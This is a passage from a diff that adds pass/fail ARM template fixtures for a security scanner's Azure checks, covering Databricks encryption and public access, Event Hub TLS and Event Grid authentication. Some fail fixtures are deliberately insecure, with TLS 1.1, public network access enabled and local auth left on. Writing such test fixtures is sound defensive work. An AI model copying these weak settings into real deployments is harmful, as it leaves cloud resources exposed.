+              "type": "string"
+            },
+            "workspaceName": {
+              "type": "string",
+              "metadata": {
+                "description": "The name of the Azure Databricks workspace to create."
+              }
+            },
+            "location": {
+              "type": "string",
+              "metadata": {
+                "description": "Location for all resources."
+              }
+            },
+            "pricingTier": {
+              "type": "string",
+              "allowedValues": [
+                "standard",
+                "premium"
+              ],
+              "metadata": {
+                "description": "The pricing tier of workspace."
+              }
+            },
+            "keyVaultName": {
+              "type": "string",
+              "metadata": {
+                "description": "The Azure Key Vault name."
+              }
+            },
+            "keyName": {
+              "type": "string",
+              "metadata": {
+                "description": "The Azure Key Vault encryption key name."
+              }
+            },
+            "disablePublicIp": {
+              "type": "bool",
+              "metadata": {
+                "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not"
+              }
+            }
+          },
+          "resources": [
+            {
+              "type": "Microsoft.Databricks/workspaces",
+              "apiVersion": "2023-02-01",
+              "name": "[parameters('workspaceName')]",
+              "location": "[parameters('location')]",
+              "sku": {
+                "name": "[parameters('pricingTier')]"
+              },
+              "properties": {
+                "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]",
+                "parameters": {
+                  "prepareEncryption": {
+                    "value": false
+                  },
+                  "enableNoPublicIp": {
+                    "value": "[parameters('disablePublicIp')]"
+                  }
+                }
+              }
+            }
+          ]
+        }
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/pass.json b/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/pass.json
new file mode 100644
index 00000000000..ae285e6fc7c
--- /dev/null
+++ b/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/pass.json
@@ -0,0 +1,78 @@
+{
+          "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+          "contentVersion": "1.0.0.0",
+          "parameters": {
+            "managedResourceGroupName": {
+              "type": "string"
+            },
+            "workspaceName": {
+              "type": "string",
+              "metadata": {
+                "description": "The name of the Azure Databricks workspace to create."
+              }
+            },
+            "location": {
+              "type": "string",
+              "metadata": {
+                "description": "Location for all resources."
+              }
+            },
+            "pricingTier": {
+              "type": "string",
+              "allowedValues": [
+                "standard",
+                "premium"
+              ],
+              "metadata": {
+                "description": "The pricing tier of workspace."
+              }
+            },
+            "keyVaultName": {
+              "type": "string",
+              "metadata": {
+                "description": "The Azure Key Vault name."
+              }
+            },
+            "keyName": {
+              "type": "string",
+              "metadata": {
+                "description": "The Azure Key Vault encryption key name."
+              }
+            },
+            "disablePublicIp": {
+              "type": "bool",
+              "metadata": {
+                "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not"
+              }
+            }
+          },
+          "resources": [
+            {
+              "type": "Microsoft.Databricks/workspaces",
+              "apiVersion": "2023-02-01",
+              "name": "[parameters('workspaceName')]",
+              "location": "[parameters('location')]",
+              "sku": {
+                "name": "[parameters('pricingTier')]"
+              },
+              "properties": {
+                "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]",
+                "parameters": {
+                  "prepareEncryption": {
+                    "value": true
+                  },
+                  "encryption": {
+                    "value": {
+                      "keySource": "Microsoft.Keyvault",
+                      "keyvaulturi": "[uri(format('https://{0}{1}', parameters('keyVaultName'), environment().suffixes.keyvaultDns), '/')]",
+                      "KeyName": "[parameters('keyName')]"
+                    }
+                  },
+                  "enableNoPublicIp": {
+                    "value": "[parameters('disablePublicIp')]"
+                  }
+                }
+              }
+            }
+          ]
+        }
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/fail.json b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/fail.json
new file mode 100644
index 00000000000..62aa4f41eda
--- /dev/null
+++ b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/fail.json
@@ -0,0 +1,69 @@
+{
+          "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+          "contentVersion": "1.0.0.0",
+          "parameters": {
+            "managedResourceGroupName": {
+              "type": "string"
+            },
+            "workspaceName": {
+              "type": "string",
+              "metadata": {
+                "description": "The name of the Azure Databricks workspace to create."
+              }
+            },
+            "location": {
+              "type": "string",
+              "metadata": {
+                "description": "Location for all resources."
+              }
+            },
+            "pricingTier": {
+              "type": "string",
+              "allowedValues": [
+                "standard",
+                "premium"
+              ],
+              "metadata": {
+                "description": "The pricing tier of workspace."
+              }
+            },
+            "keyVaultName": {
+              "type": "string",
+              "metadata": {
+                "description": "The Azure Key Vault name."
+              }
+            },
+            "keyName": {
+              "type": "string",
+              "metadata": {
+                "description": "The Azure Key Vault encryption key name."
+              }
+            },
+            "disablePublicIp": {
+              "type": "bool",
+              "metadata": {
+                "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not"
+              }
+            }
+          },
+          "resources": [
+            {
+              "type": "Microsoft.Databricks/workspaces",
+              "apiVersion": "2023-02-01",
+              "name": "[parameters('workspaceName')]",
+              "location": "[parameters('location')]",
+              "sku": {
+                "name": "[parameters('pricingTier')]"
+              },
+              "properties": {
+                "publicNetworkAccess": "Enabled",
+                "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]",
+                "parameters": {
+                  "enableNoPublicIp": {
+                    "value": "[parameters('disablePublicIp')]"
+                  }
+                }
+              }
+            }
+          ]
+        }
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/fail2.json b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/fail2.json
new file mode 100644
index 00000000000..b8ca21f4a5b
--- /dev/null
+++ b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/fail2.json
@@ -0,0 +1,68 @@
+{
+          "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+          "contentVersion": "1.0.0.0",
+          "parameters": {
+            "managedResourceGroupName": {
+              "type": "string"
+            },
+            "workspaceName": {
+              "type": "string",
+              "metadata": {
+                "description": "The name of the Azure Databricks workspace to create."
+              }
+            },
+            "location": {
+              "type": "string",
+              "metadata": {
+                "description": "Location for all resources."
+              }
+            },
+            "pricingTier": {
+              "type": "string",
+              "allowedValues": [
+                "standard",
+                "premium"
+              ],
+              "metadata": {
+                "description": "The pricing tier of workspace."
+              }
+            },
+            "keyVaultName": {
+              "type": "string",
+              "metadata": {
+                "description": "The Azure Key Vault name."
+              }
+            },
+            "keyName": {
+              "type": "string",
+              "metadata": {
+                "description": "The Azure Key Vault encryption key name."
+              }
+            },
+            "disablePublicIp": {
+              "type": "bool",
+              "metadata": {
+                "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not"
+              }
+            }
+          },
+          "resources": [
+            {
+              "type": "Microsoft.Databricks/workspaces",
+              "apiVersion": "2023-02-01",
+              "name": "[parameters('workspaceName')]",
+              "location": "[parameters('location')]",
+              "sku": {
+                "name": "[parameters('pricingTier')]"
+              },
+              "properties": {
+                "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]",
+                "parameters": {
+                  "enableNoPublicIp": {
+                    "value": "[parameters('disablePublicIp')]"
+                  }
+                }
+              }
+            }
+          ]
+        }
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/pass.json b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/pass.json
new file mode 100644
index 00000000000..64772cc8e6a
--- /dev/null
+++ b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/pass.json
@@ -0,0 +1,70 @@
+{
+          "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+          "contentVersion": "1.0.0.0",
+          "parameters": {
+            "managedResourceGroupName": {
+              "type": "string"
+            },
+            "workspaceName": {
+              "type": "string",
+              "metadata": {
+                "description": "The name of the Azure Databricks workspace to create."
+              }
+            },
+            "location": {
+              "type": "string",
+              "metadata": {
+                "description": "Location for all resources."
+              }
+            },
+            "pricingTier": {
+              "type": "string",
+              "allowedValues": [
+                "standard",
+                "premium"
+              ],
+              "metadata": {
+                "description": "The pricing tier of workspace."
+              }
+            },
+            "keyVaultName": {
+              "type": "string",
+              "metadata": {
+                "description": "The Azure Key Vault name."
+              }
+            },
+            "keyName": {
+              "type": "string",
+              "metadata": {
+                "description": "The Azure Key Vault encryption key name."
+              }
+            },
+            "disablePublicIp": {
+              "type": "bool",
+              "metadata": {
+                "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not"
+              }
+            }
+          },
+          "resources": [
+            {
+              "type": "Microsoft.Databricks/workspaces",
+              "apiVersion": "2023-02-01",
+              "name": "[parameters('workspaceName')]",
+              "location": "[parameters('location')]",
+              "sku": {
+                "name": "[parameters('pricingTier')]"
+              },
+              "properties": {
+                "publicNetworkAccess": "Disabled",
+                "requiredNsgRules": "AllRules",
+                "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]",
+                "parameters": {
+                  "enableNoPublicIp": {
+                    "value": "[parameters('disablePublicIp')]"
+                  }
+                }
+              }
+            }
+          ]
+        }
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/pass2.json b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/pass2.json
new file mode 100644
index 00000000000..6b687ab7b3e
--- /dev/null
+++ b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/pass2.json
@@ -0,0 +1,70 @@
+{
+          "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+          "contentVersion": "1.0.0.0",
+          "parameters": {
+            "managedResourceGroupName": {
+              "type": "string"
+            },
+            "workspaceName": {
+              "type": "string",
+              "metadata": {
+                "description": "The name of the Azure Databricks workspace to create."
+              }
+            },
+            "location": {
+              "type": "string",
+              "metadata": {
+                "description": "Location for all resources."
+              }
+            },
+            "pricingTier": {
+              "type": "string",
+              "allowedValues": [
+                "standard",
+                "premium"
+              ],
+              "metadata": {
+                "description": "The pricing tier of workspace."
+              }
+            },
+            "keyVaultName": {
+              "type": "string",
+              "metadata": {
+                "description": "The Azure Key Vault name."
+              }
+            },
+            "keyName": {
+              "type": "string",
+              "metadata": {
+                "description": "The Azure Key Vault encryption key name."
+              }
+            },
+            "disablePublicIp": {
+              "type": "bool",
+              "metadata": {
+                "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not"
+              }
+            }
+          },
+          "resources": [
+            {
+              "type": "Microsoft.Databricks/workspaces",
+              "apiVersion": "2023-02-01",
+              "name": "[parameters('workspaceName')]",
+              "location": "[parameters('location')]",
+              "sku": {
+                "name": "[parameters('pricingTier')]"
+              },
+              "properties": {
+                "publicNetworkAccess": "Disabled",
+                "requiredNsgRules": "NoAzureDatabricksRules",
+                "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]",
+                "parameters": {
+                  "enableNoPublicIp": {
+                    "value": "[parameters('disablePublicIp')]"
+                  }
+                }
+              }
+            }
+          ]
+        }
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_EventHubNamespaceMinTLS12/fail.json b/tests/arm/checks/resource/example_EventHubNamespaceMinTLS12/fail.json
new file mode 100644
index 00000000000..017acac3d04
--- /dev/null
+++ b/tests/arm/checks/resource/example_EventHubNamespaceMinTLS12/fail.json
@@ -0,0 +1,18 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.EventHub/namespaces",
+      "apiVersion": "2024-01-01",
+      "name": "fail",
+      "location": "[resourceGroup().location]",
+      "sku": {
+        "name": "Standard"
+      },
+      "properties": {
+        "minimumTlsVersion": "1.1"
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_EventHubNamespaceMinTLS12/pass.json b/tests/arm/checks/resource/example_EventHubNamespaceMinTLS12/pass.json
new file mode 100644
index 00000000000..3a874bba5ba
--- /dev/null
+++ b/tests/arm/checks/resource/example_EventHubNamespaceMinTLS12/pass.json
@@ -0,0 +1,22 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.EventHub/namespaces",
+      "apiVersion": "2024-01-01",
+      "name": "pass",
+      "location": "[resourceGroup().location]",
+      "sku": {
+        "name": "Standard",
+        "capacity": 2
+      },
+      "properties": {
+        "minimumTlsVersion": "1.2"
+      },
+      "tags": {
+        "environment": "Production"
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_EventHubNamespaceMinTLS12/pass2.json b/tests/arm/checks/resource/example_EventHubNamespaceMinTLS12/pass2.json
new file mode 100644
index 00000000000..edbaea43841
--- /dev/null
+++ b/tests/arm/checks/resource/example_EventHubNamespaceMinTLS12/pass2.json
@@ -0,0 +1,15 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.EventHub/namespaces",
+      "apiVersion": "2024-01-01",
+      "name": "pass2",
+      "location": "[resourceGroup().location]",
+      "sku": {
+        "name": "Standard"
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_EventgridTopicIdentityProviderEnabled/fail.json b/tests/arm/checks/resource/example_EventgridTopicIdentityProviderEnabled/fail.json
new file mode 100644
index 00000000000..583db158b9e
--- /dev/null
+++ b/tests/arm/checks/resource/example_EventgridTopicIdentityProviderEnabled/fail.json
@@ -0,0 +1,95 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.EventGrid/topics",
+      "apiVersion": "2023-12-15-preview",
+      "name": "fail",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "sku": {
+        "name": "string"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string",
+        "type": "string"
+      },
+      "identity": {
+        "principalId": "string",
+        "tenantId": "string",
+        "userAssignedIdentities": {
+          "{customized property}": {
+            "clientId": "string",
+            "principalId": "string"
+          }
+        }
+      },
+      "properties": {
+        "dataResidencyBoundary": "string",
+        "eventTypeInfo": {
+          "inlineEventTypes": {
+            "{customized property}": {
+              "dataSchemaUrl": "string",
+              "description": "string",
+              "displayName": "string",
+              "documentationUrl": "string"
+            }
+          },
+          "kind": "Inline"
+        },
+        "inboundIpRules": [
+          {
+            "action": "Allow",
+            "ipMask": "string"
+          }
+        ],
+        "inputSchema": "string",
+        "inputSchemaMapping": {
+          "inputSchemaMappingType": "string"
+        },
+        "minimumTlsVersionAllowed": "string"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_EventgridTopicIdentityProviderEnabled/pass.json b/tests/arm/checks/resource/example_EventgridTopicIdentityProviderEnabled/pass.json
new file mode 100644
index 00000000000..e67839a5799
--- /dev/null
+++ b/tests/arm/checks/resource/example_EventgridTopicIdentityProviderEnabled/pass.json
@@ -0,0 +1,98 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.EventGrid/topics",
+      "apiVersion": "2023-12-15-preview",
+      "name": "pass",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "sku": {
+        "name": "string"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string",
+        "type": "string"
+      },
+      "identity": {
+        "principalId": "string",
+        "tenantId": "string",
+        "type": "string",
+        "userAssignedIdentities": {
+          "{customized property}": {
+            "clientId": "string",
+            "principalId": "string"
+          }
+        }
+      },
+      "properties": {
+        "dataResidencyBoundary": "string",
+        "disableLocalAuth": false,
+        "eventTypeInfo": {
+          "inlineEventTypes": {
+            "{customized property}": {
+              "dataSchemaUrl": "string",
+              "description": "string",
+              "displayName": "string",
+              "documentationUrl": "string"
+            }
+          },
+          "kind": "Inline"
+        },
+        "inboundIpRules": [
+          {
+            "action": "Allow",
+            "ipMask": "string"
+          }
+        ],
+        "inputSchema": "string",
+        "inputSchemaMapping": {
+          "inputSchemaMappingType": "string"
+        },
+        "minimumTlsVersionAllowed": "string",
+        "publicNetworkAccess": "disabled"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_EventgridTopicLocalAuthentication/fail.json b/tests/arm/checks/resource/example_EventgridTopicLocalAuthentication/fail.json
new file mode 100644
index 00000000000..8893122962d
--- /dev/null
+++ b/tests/arm/checks/resource/example_EventgridTopicLocalAuthentication/fail.json
@@ -0,0 +1,96 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.EventGrid/topics",
+      "apiVersion": "2023-12-15-preview",
+      "name": "fail",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "sku": {
+        "name": "string"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string",
+        "type": "string"
+      },
+      "identity": {
+        "principalId": "string",
+        "tenantId": "string",
+        "type": "string",
+        "userAssignedIdentities": {
+          "{customized property}": {
+            "clientId": "string",
+            "principalId": "string"
+          }
+        }
+      },
+      "properties": {
+        "dataResidencyBoundary": "string",
+        "eventTypeInfo": {
+          "inlineEventTypes": {
+            "{customized property}": {
+              "dataSchemaUrl": "string",
+              "description": "string",
+              "displayName": "string",
+              "documentationUrl": "string"
+            }
+          },
+          "kind": "Inline"
+        },
+        "inboundIpRules": [
+          {
+            "action": "Allow",
+            "ipMask": "string"
+          }
+        ],
+        "inputSchema": "string",
+        "inputSchemaMapping": {
+          "inputSchemaMappingType": "string"
+        },
+        "minimumTlsVersionAllowed": "string"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_EventgridTopicLocalAuthentication/fail2.json b/tests/arm/checks/resource/example_EventgridTopicLocalAuthentication/fail2.json
new file mode 100644
index 00000000000..110ef2c2c13
--- /dev/null
+++ b/tests/arm/checks/resource/example_EventgridTopicLocalAuthentication/fail2.json
@@ -0,0 +1,98 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.EventGrid/topics",
+      "apiVersion": "2023-12-15-preview",
+      "name": "fail2",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "sku": {
+        "name": "string"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string",
+        "type": "string"
+      },
+      "identity": {
+        "principalId": "string",
+        "tenantId": "string",
+        "type": "string",
+        "userAssignedIdentities": {
+          "{customized property}": {
+            "clientId": "string",
+            "principalId": "string"
+          }
+        }
+      },
+      "properties": {
+        "dataResidencyBoundary": "string",
+        "disableLocalAuth": false,
+        "eventTypeInfo": {
+          "inlineEventTypes": {
+            "{customized property}": {
+              "dataSchemaUrl": "string",
+              "description": "string",
+              "displayName": "string",
+              "documentationUrl": "string"
+            }
+          },
+          "kind": "Inline"
+        },
+        "inboundIpRules": [
+          {
+            "action": "Allow",
+            "ipMask": "string"
+          }
+        ],
+        "inputSchema": "string",
+        "inputSchemaMapping": {
+          "inputSchemaMappingType": "string"
+        },
+        "minimumTlsVersionAllowed": "string",
+        "publicNetworkAccess": "enabled"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_EventgridTopicLocalAuthentication/pass.json b/tests/arm/checks/resource/example_EventgridTopicLocalAuthentication/pass.json
new file mode 100644
index 00000000000..bb818e68aa3
--- /dev/null
+++ b/tests/arm/checks/resource/example_EventgridTopicLocalAuthentication/pass.json
@@ -0,0 +1,98 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.EventGrid/topics",
+      "apiVersion": "2023-12-15-preview",
+      "name": "pass",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "sku": {
+        "name": "string"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string",
+        "type": "string"
+      },
+      "identity": {
+        "principalId": "string",
+        "tenantId": "string",
+        "type": "string",
+        "userAssignedIdentities": {
+          "{customized property}": {
+            "clientId": "string",
+            "principalId": "string"
+          }
+        }
+      },
+      "properties": {
+        "dataResidencyBoundary": "string",
+        "disableLocalAuth": true,
+        "eventTypeInfo": {
+          "inlineEventTypes": {
+            "{customized property}": {
+              "dataSchemaUrl": "string",
+              "description": "string",
+              "displayName": "string",
+              "documentationUrl": "string"
+            }
+          },
+          "kind": "Inline"
+        },
+        "inboundIpRules": [
+          {
+            "action": "Allow",
+            "ipMask": "string"
+          }
+        ],
+        "inputSchema": "string",
+        "inputSchemaMapping": {
+          "inputSchemaMappingType": "string"
+        },
+        "minimumTlsVersionAllowed": "string",
+        "publicNetworkAccess": "disabled"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_EventgridTopicNetworkAccess/fail.json b/tests/arm/checks/resource/example_EventgridTopicNetworkAccess/fail.json
new file mode 100644
index 00000000000..ebdd9f75e7d
--- /dev/null
+++ b/tests/arm/checks/resource/example_EventgridTopicNetworkAccess/fail.json
@@ -0,0 +1,97 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.EventGrid/topics",
+      "apiVersion": "2023-12-15-preview",
+      "name": "fail",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "sku": {
+        "name": "string"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string",
+        "type": "string"
+      },
+      "identity": {
+        "principalId": "string",
+        "tenantId": "string",
+        "type": "string",
+        "userAssignedIdentities": {
+          "{customized property}": {
+            "clientId": "string",
+            "principalId": "string"
+          }
+        }
+      },
+      "properties": {
+        "dataResidencyBoundary": "string",
+        "disableLocalAuth": "bool",
+        "eventTypeInfo": {
+          "inlineEventTypes": {
+            "{customized property}": {
+              "dataSchemaUrl": "string",
+              "description": "string",
+              "displayName": "string",
+              "documentationUrl": "string"
+            }
+          },
+          "kind": "Inline"
+        },
+        "inboundIpRules": [
+          {
+            "action": "Allow",
+            "ipMask": "string"
+          }
+        ],
+        "inputSchema": "string",
+        "inputSchemaMapping": {
+          "inputSchemaMappingType": "string"
+        },
+        "minimumTlsVersionAllowed": "string"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_EventgridTopicNetworkAccess/fail2.json b/tests/arm/checks/resource/example_EventgridTopicNetworkAccess/fail2.json
new file mode 100644
index 00000000000..a49ccae0037
--- /dev/null
+++ b/tests/arm/checks/resource/example_EventgridTopicNetworkAccess/fail2.json
@@ -0,0 +1,98 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.EventGrid/topics",
+      "apiVersion": "2023-12-15-preview",
+      "name": "fail2",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
